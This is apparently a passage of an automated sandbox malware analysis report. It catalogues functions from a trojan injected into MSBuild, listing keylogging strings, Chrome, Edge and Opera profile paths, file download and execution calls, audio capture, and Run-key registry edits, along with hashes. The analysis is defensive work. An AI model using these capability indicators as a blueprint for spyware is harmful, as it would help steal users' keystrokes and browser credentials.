                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                          • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                          • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                                          • GetLastError.KERNEL32 ref: 00449F2B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide
                                          • String ID: PkGNG
                                          • API String ID: 203985260-263838557
                                          • Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                          • Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
                                          • Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                          • Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
                                          APIs
                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                          • __Init_thread_footer.LIBCMT ref: 0040B797
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer__onexit
                                          • String ID: [End of clipboard]$[Text copied to clipboard]
                                          • API String ID: 1881088180-3686566968
                                          • Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                          • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                          • Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                          • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                          APIs
                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ACP$OCP
                                          • API String ID: 0-711371036
                                          • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                          • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                          • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                          • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                          APIs
                                          • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                          • GetLastError.KERNEL32 ref: 0044B804
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorFileLastWrite
                                          • String ID: PkGNG
                                          • API String ID: 442123175-263838557
                                          • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                          • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                                          • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                          • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                                          APIs
                                          • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                          • GetLastError.KERNEL32 ref: 0044B716
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorFileLastWrite
                                          • String ID: PkGNG
                                          • API String ID: 442123175-263838557
                                          • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                          • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                                          • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                          • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                                          APIs
                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                          Strings
                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: KeepAlive | Enabled | Timeout:
                                          • API String ID: 481472006-1507639952
                                          • Opcode ID: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                                          • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                          • Opcode Fuzzy Hash: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                                          • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                          APIs
                                          • Sleep.KERNEL32 ref: 00416640
                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DownloadFileSleep
                                          • String ID: !D@
                                          • API String ID: 1931167962-604454484
                                          • Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                          • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                          • Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                          • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: alarm.wav$hYG
                                          • API String ID: 1174141254-2782910960
                                          • Opcode ID: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                                          • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                          • Opcode Fuzzy Hash: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                                          • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                          APIs
                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                          • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                          • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                          • String ID: Online Keylogger Stopped
                                          • API String ID: 1623830855-1496645233
                                          • Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                          • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                          • Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                          • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String
                                          • String ID: LCMapStringEx$PkGNG
                                          • API String ID: 2568140703-1065776982
                                          • Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                                          • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                          • Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                                          • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                          APIs
                                          • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                          • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$BufferHeaderPrepare
                                          • String ID: XMG
                                          • API String ID: 2315374483-813777761
                                          • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                          • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                          • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                          • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                          APIs
                                          • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LocaleValid
                                          • String ID: IsValidLocaleName$JD
                                          • API String ID: 1901932003-2234456777
                                          • Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                          • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                          • Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                          • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                          • API String ID: 1174141254-4188645398
                                          • Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                          • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                          • Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                          • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                          • API String ID: 1174141254-2800177040
                                          • Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                          • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                          • Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                          • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                          APIs
                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: AppData$\Opera Software\Opera Stable\
                                          • API String ID: 1174141254-1629609700
                                          • Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                          • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                          • Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                          • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                          APIs
                                          • GetKeyState.USER32(00000011), ref: 0040B64B
                                            • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                            • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                            • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                            • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                            • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                            • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                            • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                            • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                          • String ID: [AltL]$[AltR]
                                          • API String ID: 2738857842-2658077756
                                          • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                          • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                          • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                          • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                          APIs
                                          • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                          • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: uD
                                          • API String ID: 0-2547262877
                                          • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                          • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                          • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                          • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$FileSystem
                                          • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                          • API String ID: 2086374402-949981407
                                          • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                          • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                          • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                          • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: !D@$open
                                          • API String ID: 587946157-1586967515
                                          • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                          • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                          • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                          • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                          APIs
                                          • ___initconout.LIBCMT ref: 0045555B
                                            • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                          • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConsoleCreateFileWrite___initconout
                                          • String ID: PkGNG
                                          • API String ID: 3087715906-263838557
                                          • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                          • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                          • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                          • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                          APIs
                                          • GetKeyState.USER32(00000012), ref: 0040B6A5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: State
                                          • String ID: [CtrlL]$[CtrlR]
                                          • API String ID: 1649606143-2446555240
                                          • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                          • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                          • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                          • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                          APIs
                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                          • __Init_thread_footer.LIBCMT ref: 00410F29
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer__onexit
                                          • String ID: ,kG$0kG
                                          • API String ID: 1881088180-2015055088
                                          • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                          • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                          • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                          • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                          • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteOpenValue
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                          • API String ID: 2654517830-1051519024
                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                          • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                          • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                          • GetLastError.KERNEL32 ref: 00440D35
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast
                                          • String ID:
                                          • API String ID: 1717984340-0
                                          • Opcode ID: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                          • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                          • Opcode Fuzzy Hash: a909a75f279edaa9992fcfd87f44a9f238bfc46e7277e37c8624290a99980dba
                                          • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                          APIs
                                          • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                          • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                          • SetLastError.KERNEL32(0000007F), ref: 00411C7A
                                          • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastRead
                                          • String ID:
                                          • API String ID: 4100373531-0
                                          • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                          • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                          • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                          • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99